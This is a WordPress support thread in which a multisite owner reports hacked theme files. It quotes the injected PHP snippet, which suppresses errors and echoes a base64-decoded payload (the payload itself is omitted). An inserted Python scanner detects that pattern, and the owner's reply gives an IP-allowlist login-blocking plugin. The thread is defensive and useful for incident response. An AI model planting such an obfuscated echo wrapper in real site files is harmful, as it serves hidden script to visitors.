• Resolved frank tredici

    (@frank13)


    All of my WPMS Network sites got hacked again. Last time it happened was through Gravity Forms so I totally deleted and deactivated all gravity forms across my network.

    This morning, at 04:39 AM ET, each of my sites' and themes' header.php and footer.php documents got altered.

    Here is what appears in one of them right after the <?php wp_head(); ?>

    <!--visitorTracker--><?php @ob_start();@ini_set("display_errors",0);@error_reporting(0);echo base64_decode("[base64 payload omitted]");?><!--visitorTracker-->
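
A defender-side check for the wrapper quoted above, as an added example that is not part of the original post: it walks a theme tree, flags PHP files that contain the `<!--visitorTracker-->` marker or an `echo base64_decode("...")` literal, and decodes the literal to see whether it emits a `<script>` tag. The function names, finding labels and sample files are constructed for illustration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

MARKER = "<!--visitorTracker-->"  # marker comment quoted in the post
# echo base64_decode("...") with a literal argument; wrapped copies contain line breaks.
ECHO_B64 = re.compile(r"""echo\s+base64_decode\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)""")


def inspect_php(text):
    """Return finding labels for the contents of one PHP file."""
    findings = ["marker"] if MARKER in text else []
    for match in ECHO_B64.finditer(text):
        blob = "".join(match.group(2).split())
        try:
            decoded = base64.b64decode(blob, validate=True)
        except binascii.Error:
            findings.append("echo-base64-undecodable")
            continue
        is_script = b"<script" in decoded.lower()
        findings.append("echo-base64-script" if is_script else "echo-base64")
    return findings


def scan_tree(root):
    """Map each *.php file under root that has findings to its labels."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = inspect_php(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


def build_sample_tree(root):
    """Constructed sample theme: one clean file, one carrying the wrapper."""
    theme = Path(root) / "themes" / "sample"
    theme.mkdir(parents=True)
    blob = base64.b64encode(b"<script>/* constructed sample */</script>").decode()
    (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
    injected = MARKER + '<?php @ob_start();echo base64_decode("' + blob + '");?>' + MARKER
    (theme / "header.php").write_text("<?php wp_head(); ?>\n" + injected + "\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan_tree(tmp))
```

Point `scan_tree` at `wp-content` on a copy of the site; legitimate plugins occasionally echo decoded base64 too, so treat a plain `echo-base64` finding as something to review rather than proof of injection.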
Viewing 1 replies (of 1 total)
  • Thread Starter frank tredici

    (@frank13)

    Given the .htaccess method for preventing login attacks does not work in WordPress Multi-site, here is the solution I came up with for anyone wishing to truly button down their WPMS Network:

    Step 1: create a script and upload it to ./wp-content/mu-plugins/. I called my script “loginBlocker.php”.

    Step 2: here is the loginBlocker.php script:

    <?php
    /**
     * Plugin Name: WordPress Network Login Access & Control
     * Plugin URI: https://example.com/
     * Description: Login request intercept used on all sites in the network.
     * Version: 1.0
     * Author: F.Tredici
     * Author URI: https://example.com/ftredici/
     * License: GPLU
     */
    
    function loginController_func() {
    
        $authorizedIPs = array(
            '123.456.789.012', // authorized user #1
            '987.654.321.098' // authorized user #2
        );
    
        if (!in_array($_SERVER['REMOTE_ADDR'], $authorizedIPs)) {
            wp_redirect( 'https://example.com/', 301 );
            exit;
        }
    
    }
    add_action('wp_authenticate', 'loginController_func'); // hook for wp-admin
    add_action('login_init', 'loginController_func'); // hook for wp-login all actions
    ?>

    Step 3: simply add the IP Address(es) for your authorized login sources to the $authorizedIPs array() and you’ll have better “peace” of mind.

    Good luck and happy hacker-blocking.

  • The topic ‘My Multisite Network Sites got Hacked Again – How to Prevent’ is closed to new replies.